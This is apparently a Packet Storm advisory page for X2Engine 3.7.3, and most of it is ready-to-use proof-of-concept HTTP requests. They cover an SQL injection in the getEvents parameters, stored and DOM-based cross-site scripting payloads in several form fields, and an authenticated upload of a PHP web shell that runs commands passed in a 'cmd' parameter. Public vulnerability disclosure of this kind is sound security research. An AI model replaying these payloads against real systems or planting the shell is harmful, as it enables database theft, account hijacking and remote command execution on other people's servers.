what you don't know can hurt you

X2Engine 3.7.3 Cross Site Scripting / Shell Upload / SQL Injection

X2Engine 3.7.3 Cross Site Scripting / Shell Upload / SQL Injection
Posted Feb 27, 2014
Authored by HauntIT

X2Engine version 3.7.3 suffers from cross site scripting, remote shell upload, and remote SQL injection vulnerabilities.

tags | exploit, remote, shell, vulnerability, xss, sql injection
MD5 | 7fb5efe01bf5fb010514f711fc818978

X2Engine 3.7.3 Cross Site Scripting / Shell Upload / SQL Injection

Change Mirror Download
# ==============================================================
# Title ...| Multiple vulnerabilities in X2Engine
# Version .| X2Engine 3.7.3
# Date ....| .02.2014
# Found ...| HauntIT Blog
# Home ....|
# ==============================================================

[+] For admin logged in

# ==============================================================
# 1. SQL Injection

---<request>---
GET /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/profile/getEvents?lastEventId='mynameissqli&lastTimestamp=0&profileId=1&myProfileId=1 HTTP/1.1
Host: 10.149.14.62
(...)
Connection: close
---<request>---


Parameter "lastTimestamp" is also vulnerable.


# ==============================================================
# 2. XSS

---<request>---
POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/contacts/create HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 917

Contacts%5BfirstName%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&Contacts%5Btitle%5D=tester&Contacts%5Bphone%5D=&Contacts%5Bphone2%5D=&Contacts%5BdoNotCall%5D=0&Contacts%5BlastName%5D=tester&Contacts%5Bcompany_id%5D=&Contacts%5Bcompany%5D=&Contacts%5Bwebsite%5D=&Contacts%5Bemail%5D=&Contacts%5BdoNotEmail%5D=0&Contacts%5Bleadtype%5D=&Contacts%5BleadSource%5D=&Contacts%5Bleadstatus%5D=&Contacts%5BleadDate%5D=&Contacts%5Binterest%5D=&Contacts%5Bdealvalue%5D=%240.00&Contacts%5Bclosedate%5D=&Contacts%5Bdealstatus%5D=&Contacts%5Baddress%5D=&Contacts%5Baddress2%5D=&Contacts%5Bcity%5D=&Contacts%5Bstate%5D=&Contacts%5Bzipcode%5D=&Contacts%5Bcountry%5D=&Contacts%5BbackgroundInfo%5D=&Contacts%5Bskype%5D=&Contacts%5Blinkedin%5D=&Contacts%5Btwitter%5D=&Contacts%5Bfacebook%5D=&Contacts%5Bgoogleplus%5D=&Contacts%5BotherUrl%5D=&Contacts%5BassignedTo%5D=admin&Contacts%5Bpriority%5D=&Contacts%5Bvisibility%5D=1&yt0=Create
---<request>---

Also vulnerable: Contacts%5Bwebsite%5D, Contacts%5Bcompany%5D, Contacts%5Binterest%5D...


# ==============================================================
# 3. Arbitrary File Upload


---<request>---
POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/media/ajaxUpload?CKEditor=input&CKEditorFuncNum=1&langCode=en HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 241

-----------------------------20967107015427
Content-Disposition: form-data; name="upload"; filename="mishell.php"
Content-Type: application/octet-stream

<?php system($_REQUEST['cmd']); ?>
-----------------------------20967107015427--

---<request>---

To access shell, go to:
http://10.149.14.62/(...)/X2Engine-3.7.3/x2engine/uploads/media/admin/mishell.php?cmd=id



# ==============================================================
# 4. DOM-based XSS

---<request>---
POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/media/ajaxUpload?CKEditor=input&CKEditorFuncNum='');</script><script>alert(1)</script>&langCode=en HTTP/1.1
Host: 10.149.14.62
(...) <!-- yes, I know. This is the same request as [3] ;)
Content-Length: 241

-----------------------------20967107015427
Content-Disposition: form-data; name="upload"; filename="mishell.php"
Content-Type: application/octet-stream

<?php system($_REQUEST['cmd']); ?>
-----------------------------20967107015427--

---<request>---



# ==============================================================
# 5. XSS

---<request>---
POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/docs/create HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 260

Docs%5Bname%5D='%3e"%3e%3cbody%2fonload%3dalert(991212129)%3e&Docs%5Bvisibility%5D=1&yt0=Create&Docs%5Btext%5D=%3Chtml%3E%0D%0A%3Chead%3E%0D%0A%09%3Ctitle%3E%3C%2Ftitle%3E%0D%0A%3C%2Fhead%3E%0D%0A%3Cbody%3Eaaaaaaaaaaaaaaaa%3C%2Fbody%3E%0D%0A%3C%2Fhtml%3E%0D%0A
---<request>---




# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
Login or Register to add favorites

File Archive:

January 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    0 Files
  • 3
    Jan 3rd
    20 Files
  • 4
    Jan 4th
    4 Files
  • 5
    Jan 5th
    37 Files
  • 6
    Jan 6th
    20 Files
  • 7
    Jan 7th
    4 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    0 Files
  • 10
    Jan 10th
    18 Files
  • 11
    Jan 11th
    8 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    31 Files
  • 14
    Jan 14th
    2 Files
  • 15
    Jan 15th
    2 Files
  • 16
    Jan 16th
    2 Files
  • 17
    Jan 17th
    18 Files
  • 18
    Jan 18th
    13 Files
  • 19
    Jan 19th
    15 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close